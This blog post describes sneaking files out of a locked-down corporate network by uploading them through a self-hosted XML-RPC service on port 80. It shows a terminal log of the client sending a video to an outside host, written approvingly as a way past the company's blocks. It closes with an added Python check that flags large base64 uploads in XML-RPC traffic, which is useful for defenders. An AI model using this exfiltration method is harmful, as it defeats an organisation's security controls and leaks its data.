Bypassing firewalls with XML-RPC

By ddsi

I know… lots of people are talking about insecure web services nowadays. Until recently I didn't have much to do with it. However, I was in one quite secure environment the other week, and had to transfer a utility I wrote outside the company. I also needed to transfer a video of the utility in action outside.

A lot of the “normal” ways of transferring data out of the company were already restricted: ssh and mail attachments were blocked, and even USB and CD-ROMs were locked down. So I had to either print the source code and retype it later, or come up with a way to transfer files reliably. The proxy servers did not allow access to the usual upload sites like Rapidshare. One option was to connect to port 80 somewhere and upload the file that way, since the company allowed only HTTP GET and POST egress. Pain in the butt :) or good security :) Unfortunately, visits to my home page were blocked by Websense under the “Personal homepages” policy. Not much to do there.

Thinking about it some more, I decided to take down my home site and mount an XML-RPC service on port 80 instead. After tweaking things here and there, it looked promising. Here's the client and server I wrote to finally copy binary/text files via my web service. I based it on Twisted Python, which is great stuff.


dimas@moo ~/scripts/python/twisted $ ls -l ~/Desktop/video.wmv
-rw-r--r-- 1 dimas dimas 7732360 May 14 16:37 /home/dimas/Desktop/video.wmv

dimas@moo ~/scripts/python/twisted $ ./xmlrpc_client.py ~/Desktop/video.wmv 'http://externalsite:80'
[c]Preparing for service at: http://externalsite:80
[c]Connected to http://externalsite:80
[c]Uploading file /home/dimas/Desktop/video.wmv
[c]Client digest:1a0444dff540bd641d23d28e21288804e6fd0735
[s]Server digest:1a0444dff540bd641d23d28e21288804e6fd0735
[c]File upload status: UPLD_OK

It was a success. The XML-RPC calls went undetected (or at least were not prevented). Also, anyone who visits externalsite:80 will not see the usual upload page, which is always better :) anyway.

Here is the code. I checksum the data with SHA-1, base64-encode it on one end and reverse it on the other.

XML-RPC twisted client

XML-RPC twisted server

So, really, how are people going to fix this? Unless they do some really intelligent packet inspection and know the business logic, it's hard to do. XML-RPC clients and servers are mostly custom within organisations, and one needs to teach the parsing software the proper rules.
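One way to start on that inspection, as an added example that is not the post's own code: a small Python check that parses an XML-RPC POST body and flags any parameter that decodes to a large base64 blob, which is exactly the shape of transfer described above. The method name, the size threshold and the sample request are constructed for the example.

```python
# Added example (not the post's code): an egress check over an XML-RPC POST
# body that flags parameters decoding to a large base64 blob, the shape of
# transfer the post describes. Threshold, method name and sample are constructed.
import base64
import binascii
import xml.etree.ElementTree as ET

MAX_PARAM_BYTES = 64 * 1024  # decoded size above which a param looks like a file


def _decoded_size(text):
    """Return the decoded length if `text` is strict base64, else None."""
    compact = "".join(text.split())  # XML-RPC base64 is often line-wrapped
    if len(compact) < 16 or len(compact) % 4:
        return None
    try:
        return len(base64.b64decode(compact, validate=True))
    except (binascii.Error, ValueError):
        return None


def inspect_xmlrpc(body, limit=MAX_PARAM_BYTES):
    """Parse a methodCall; return (method, [(param_index, decoded_bytes), ...])
    for every <base64> or <string> parameter larger than `limit` when decoded."""
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        return None, []
    method = root.findtext("methodName", default="")
    findings = []
    for idx, param in enumerate(root.iter("param")):
        for node in param.iter():  # walks nested structs/arrays too
            if node.tag in ("base64", "string"):
                size = _decoded_size(node.text or "")
                if size is not None and size > limit:
                    findings.append((idx, size))
    return method, findings


# Constructed sample: a filename string plus a 100 KiB base64 payload.
SAMPLE_BODY = (
    "<?xml version='1.0'?><methodCall><methodName>upload</methodName>"
    "<params><param><value><string>video.wmv</string></value></param>"
    "<param><value><base64>%s</base64></value></param></params></methodCall>"
    % base64.b64encode(b"\x00" * 100 * 1024).decode()
)

if __name__ == "__main__":
    print(inspect_xmlrpc(SAMPLE_BODY))  # ('upload', [(1, 102400)])
```

A proxy or WAF hook would apply the same check per request; the threshold is the tuning knob, since small base64 strings are legitimate in many XML-RPC APIs.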
